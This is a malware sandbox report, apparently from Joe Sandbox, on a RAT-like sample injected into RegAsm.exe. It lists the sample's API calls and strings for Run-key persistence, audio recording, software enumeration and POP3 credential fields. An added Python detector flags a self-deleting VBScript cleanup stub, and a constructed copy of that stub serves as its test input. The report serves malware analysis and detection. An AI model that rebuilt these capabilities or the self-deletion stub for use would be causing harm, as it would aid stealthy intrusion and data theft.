                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                          • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                          • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                          • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                          • ExitProcess.KERNEL32 ref: 0040D80B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                          • API String ID: 1861856835-1447701601
                                          • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                          • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                          • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                          • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                          APIs
                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,`.p,004752F0,?,pth_unenc), ref: 0040B8F6
                                            • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                            • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                          • ExitProcess.KERNEL32 ref: 0040D454
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`.p$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                          • API String ID: 3797177996-1667283432
                                          • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                          • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                          • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                          • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
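The two records above describe the same cleanup routine: the process resolves its own path (GetModuleFileNameW), deletes its HKEY_CURRENT_USER (0x80000001) Run / Policies\Explorer\Run key (RegDeleteKeyA), resets the attributes of its files to FILE_ATTRIBUTE_NORMAL (0x80), writes a %TEMP%\update.vbs whose fragments appear in the String ID fields (a wait loop on fso.FileExists, fso.DeleteFile / fso.DeleteFolder on the implant path, then deletion of the script itself via Wscript.ScriptFullName), launches it with ShellExecuteW("open") and calls ExitProcess. The scanner below is an added example for this report, not code from Joe Sandbox or from the analysed sample; it scores a VBScript body against those fragments so a responder can triage scripts recovered from %TEMP%. The indicator weights, the alert threshold and the two sample scripts are assumptions constructed for the example; the stub is assembled from the fragments in the order the String ID field suggests and is not the actual dropped update.vbs.

```python
import re
from dataclasses import dataclass, field

# Indicators lifted from the String ID fields of the two records above.
# Weights are an assumption chosen for this example, not values from the report.
INDICATORS = [
    ("error_suppression", re.compile(r"^\s*On Error Resume Next", re.I | re.M), 1),
    ("fso_object", re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I), 1),
    ("wait_for_unlock", re.compile(r"while\s+fso\.FileExists\(", re.I), 2),
    ("delete_target", re.compile(r'fso\.DeleteFile\s+"', re.I), 2),
    ("delete_folder", re.compile(r'fso\.DeleteFolder\s+"', re.I), 1),
    ("shell_cmd", re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c', re.I), 2),
    ("self_delete", re.compile(r"fso\.DeleteFile\(Wscript\.ScriptFullName\)", re.I), 3),
]

# Assumed alert threshold: a wait loop plus a delete plus self-deletion is enough.
THRESHOLD = 6

# Quoted paths the stub polls or removes; recovers what the implant was cleaning up.
TARGET_RE = re.compile(r'(?:FileExists\(|DeleteFile\s+|DeleteFolder\s+)"([^"]+)"', re.I)


@dataclass
class ScanResult:
    matched: list = field(default_factory=list)   # indicator names that hit
    targets: list = field(default_factory=list)   # quoted paths the stub touches
    score: int = 0

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def scan_vbs(text: str) -> ScanResult:
    """Score a VBScript body against the Remcos-style self-delete stub indicators."""
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            result.matched.append(name)
            result.score += weight
    for m in TARGET_RE.finditer(text):
        if m.group(1) not in result.targets:
            result.targets.append(m.group(1))
    return result


# Constructed sample input: the report's fragments assembled into the layout the
# String ID order suggests. This is an assumption, not the actual update.vbs.
SAMPLE_STUB = '''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\\Users\\victim\\AppData\\Roaming\\app\\app.exe")
fso.DeleteFile "C:\\Users\\victim\\AppData\\Roaming\\app\\app.exe"
wend
fso.DeleteFolder "C:\\Users\\victim\\AppData\\Roaming\\app"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign script that also uses FileSystemObject, to show the threshold.
BENIGN_SCRIPT = '''Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "C:\\reports\\daily.txt", "D:\\archive\\daily.txt"
'''

if __name__ == "__main__":
    for label, body in (("stub", SAMPLE_STUB), ("benign", BENIGN_SCRIPT)):
        r = scan_vbs(body)
        print(f"{label}: suspicious={r.suspicious} score={r.score} "
              f"matched={r.matched} targets={r.targets}")
```

The wait loop and the self-deletion line are also common in legitimate updater scripts, so a hit is best combined with the launch context these records show: a script under %TEMP% started through ShellExecuteW("open") by a process that has just deleted its own Run key and exits immediately afterwards.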
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                          • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                          • CloseHandle.KERNEL32(00000000), ref: 00412576
                                          • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                          • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                          • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                            • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                          • Sleep.KERNEL32(000001F4), ref: 004126BD
                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                          • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                          • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                          • API String ID: 2649220323-436679193
                                          • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                          • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                          • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                          • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                          APIs
                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                          • API String ID: 738084811-2094122233
                                          • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                          • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                          • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                          • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Write$Create
                                          • String ID: RIFF$WAVE$data$fmt
                                          • API String ID: 1602526932-4212202414
                                          • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                          • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                          • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                          • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                          APIs
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,`.p,00407709), ref: 004072BF
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                          • API String ID: 1646373207-255920310
                                          • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                          • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                          • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                          • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$EnvironmentVariable
                                          • String ID: X8p
                                          • API String ID: 1464849758-3665062877
                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                          • API String ID: 4218353326-3023110444
                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                          APIs
                                          • _wcslen.LIBCMT ref: 0040CE42
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                          • CopyFileW.KERNEL32 ref: 0040CF0B
                                          • _wcslen.LIBCMT ref: 0040CF21
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                          • CopyFileW.KERNEL32 ref: 0040CFBF
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                          • _wcslen.LIBCMT ref: 0040D001
                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                          • CloseHandle.KERNEL32 ref: 0040D068
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$`.p$del$open
                                          • API String ID: 1579085052-2010783679
                                          • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                          • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                          • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                          • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                          • _wcslen.LIBCMT ref: 0041C1CC
                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                          • GetLastError.KERNEL32 ref: 0041C204
                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                          • GetLastError.KERNEL32 ref: 0041C261
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                          • String ID: ?
                                          • API String ID: 3941738427-1684325040
                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID: %m$~$Gon~$~F@7$~dra
                                          • API String ID: 4218353326-230879103
                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnumOpen
                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                          • API String ID: 1332880857-3714951968
                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                          APIs
                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                          • ExitProcess.KERNEL32 ref: 0041D6F6
